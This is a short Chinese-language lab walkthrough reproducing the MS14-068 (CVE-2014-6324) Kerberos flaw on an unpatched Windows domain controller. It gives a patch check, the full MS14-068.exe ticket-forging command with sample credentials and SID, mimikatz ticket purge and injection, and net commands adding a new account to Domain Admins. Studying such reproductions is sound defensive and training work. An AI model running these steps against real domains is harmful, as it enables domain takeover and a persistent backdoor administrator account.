影响范围

  1. Windows Server 2003
  2. Windows Server 2008
  3. Windows Server 2008 R2
  4. Windows Server 2012 Windows Server 2012 R

测试环境

攻击机:Windows7
域控:Widnwos 2008R2

效果

从普通域用户提升为域管理员

条件

一个普通域账号及其正确的密码
未打补丁 KB3011780

复现过程

先检查下是否有MS14-068, CVE编号CVE-2014-6324,补丁为 3011780
systeminfo |find “3011780”
如果返回为空就说明没有打补丁,存在漏洞,需要注意的是域内普通用户提权成功后是有时效性的。

  1. dir \\dc.tom.cn\c$

查看是否可以访问到DC主机
image.png

获取信息

通过抓取本机的一些信息
image.png
SID

  1. S-1-5-21-2954952267-3703049468-467205008-1103

账号密码:pms Admin@123

利用

MS14-068伪造票据
ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址

  1. MS14-068.exe -u pms@tom.cn -p Admin@123 -s S-1-5-21-2954952267-3703049468-467205008-1103 -d DC.tom.cn

执行后本地生成票据:
image.png
使用mimikatz 清空缓存的凭证
kerberos::purge
kerberos::ptc C:\Users\n001\Desktop\TGT_n001@ninitom.cn.ccache
注意:这时候你需要注意当前执行的权限,如果mimikatz使用的是管理员权限,那么你需要到管理员下面查看票据;普通用户就需要在普通用户下查看票据。
image.png

再次访问域控的目录

image.png

添加账号权限

net user test Admin1234 /add /domain
net group “Domain Admins” test /add /domain
image.png

工具

https://github.com/gentilkiwi/mimikatz
MS14-068.7z